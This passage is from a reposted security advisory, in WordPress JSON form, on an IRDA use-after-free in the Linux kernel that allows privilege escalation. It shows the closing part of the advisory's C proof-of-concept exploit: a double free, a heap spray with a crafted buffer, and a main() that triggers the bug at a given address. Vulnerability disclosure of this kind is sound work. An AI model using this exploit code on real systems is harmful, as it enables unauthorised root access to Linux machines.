class=\"crayon-v\">fd4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x30<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;c&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-297\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;[+] Freeing object again \\n&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-298\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-299\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-300\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;[+] Fill the last object with payload \\n&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-301\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xcc<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-302\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">spray_heap<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-303\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-304\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">usleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-305\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-306\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-307\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-308\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-309\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">argv<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-310\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-311\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">long<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target_addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-312\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">pid_t <\/span><span class=\"crayon-v\">pid<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-313\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-314\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">argc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-315\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;%s &lt;target object&gt;\\n&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-316\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-317\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-318\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">sscanf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;%lx&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">target_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-319\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-320\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">uaf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-321\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-322\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">trigger<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-323\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>For a presentation with a detailed graphical explanation of the vulnerabilities, see:<br \/> <a 
href=\"https:\/\/cdn2.hubspot.net\/hubfs\/2518562\/beVX\/bevx-Dissecting-a-17-year-old-Vitaly-Nikolenko.pdf?t=1537941151847\">beVX &#8211; Dissecting a 17 year old (Vitaly Nikolenko)<\/a><\/p>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3759\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Thu, 27 Sep 2018 11:23:40 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two vulnerabilities in the Linux Kernel. By combining these two vulnerabilities a privilege escalation can be achieved. The two vulnerabilities are quite old and have been around for at least 17 years, quite a few Long Term releases of Linux have them in their kernel. 
While the assessment of &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3759\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 IRDA Linux Driver UAF<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11946,10757,13145],"class_list":["post-13461","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-privilege-escalation","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13461","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13461"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13461\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13461"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13461"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13461"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}